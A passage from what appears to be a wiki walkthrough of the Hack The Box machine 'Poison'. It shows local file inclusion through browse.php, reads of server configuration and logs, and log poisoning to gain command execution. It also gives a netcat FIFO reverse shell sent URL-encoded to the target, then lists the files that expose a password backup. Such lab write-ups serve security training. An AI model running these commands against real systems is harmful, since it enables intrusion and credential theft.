10.10.14.2 - - [31/Jan/2021:12:56:16 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:12:56:28 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=browse.php HTTP/1.1" 200 44 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:12:57 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 388 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:13:13:54 +0100] "GET /browse.php?file=php://filter/convert.base64-encode/resource=listfiles.php HTTP/1.1" 200 120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:38:15 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:06 +0100] "GET /browse.php?dsadasasd HTTP/1.1" 200 321 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:25 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:41:41 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:42:27 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:09 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:17 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:48 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:47:52 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:22 +0100] "GET /browse.php?file=u505 HTTP/1.1" 200 353 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:48:44 +0100] "GET /browse.php?file=/usr/local/www/apache24/httpd.conf HTTP/1.1" 200 413 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:02 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:21 +0100] "GET /browse.php?file=/usr/local/etc/apache24/httpd.conf HTTP/1.1" 200 21199 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:49:53 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:02 +0100] "GET /browse.php?file=/var/log/httpd-error.log HTTP/1.1" 200 5002 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:20 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 3991 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:50:40 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4120 "-" "curl/7.74.0"
10.10.14.2 - - [31/Jan/2021:14:51:29 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
10.10.14.2 - - [31/Jan/2021:14:53:06 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4445 "-" "u505 

Warning:  system(): Cannot execute a blank command in /var/log/httpd-access.log on line 35

"
10.10.14.2 - - [31/Jan/2021:14:53:30 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 4693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"

With the parameter cmd filled, we obtain code execution.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=whoami" | grep u505
10.10.14.2 - - [31/Jan/2021:15:18:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1762 "-" "u505: www

We can test connectivity, first tcpdump monitors for ICMP activity.

u505@naos:~/HTB/Machines/Poison$ sudo tcpdump -i tun0 icmp
[sudo] password for u505:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes

Send a ping from the target.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=ping+-c+1+10.10.14.2" | grep u505
10.10.14.2 - - [31/Jan/2021:15:18:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log HTTP/1.1" 200 1762 "-" "u505: PING 10.10.14.2 (10.10.14.2): 56 data bytes

Tcpdump tracks the ping.

u505@naos:~/HTB/Machines/Poison$ sudo tcpdump -i tun0 icmp
[sudo] password for u505:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
09:19:00.572604 IP poison > 10.10.14.2: ICMP echo request, id 54786, seq 0, length 64
09:19:00.572636 IP 10.10.14.2 > poison: ICMP echo reply, id 54786, seq 0, length 64

Reverse shell

u505@naos:~/HTB/Machines/Poison$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

We want to send this command to the target.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 4444 >/tmp/f

We URL encode it.

u505@naos:~/HTB/Machines/Poison$ curl -s "http://poison.htb/browse.php?file=/var/log/httpd-access.log&cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.2+4444+>/tmp/f" | grep u505

The reverse shell opens.

u505@naos:~/HTB/Machines/Poison$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.84.
Ncat: Connection from 10.10.10.84:33918.
sh: can't access tty; job control turned off
$ whoami
www
$ ls -ltr
total 56
-rw-r--r--  1 root  wheel    33 Jan 24  2018 browse.php
-rw-r--r--  1 root  wheel    27 Jan 24  2018 info.php
-rw-r--r--  1 root  wheel    33 Jan 24  2018 ini.php
-rw-r--r--  1 root  wheel    90 Jan 24  2018 listfiles.php
-rw-r--r--  1 root  wheel   289 Jan 24  2018 index.php
-rw-r--r--  1 root  wheel    20 Jan 24  2018 phpinfo.php
-rw-r--r--  1 root  wheel  1267 Mar 19  2018 pwdbackup.txt

Now we access the pwdbackup.txt file, and we can decode it to obtain charix password.

References

Daniel Simao 06:21, 31 January 2021 (EST)

Contents

Ports scan

Web enumeration

Decode password

User Flag

Privileges escalation

Intended way

Log file location

Log file poisoning

Reverse shell

References

Navigation menu

Personal tools

Namespaces

Variants

Views

More

Search

LuniWiki

Tools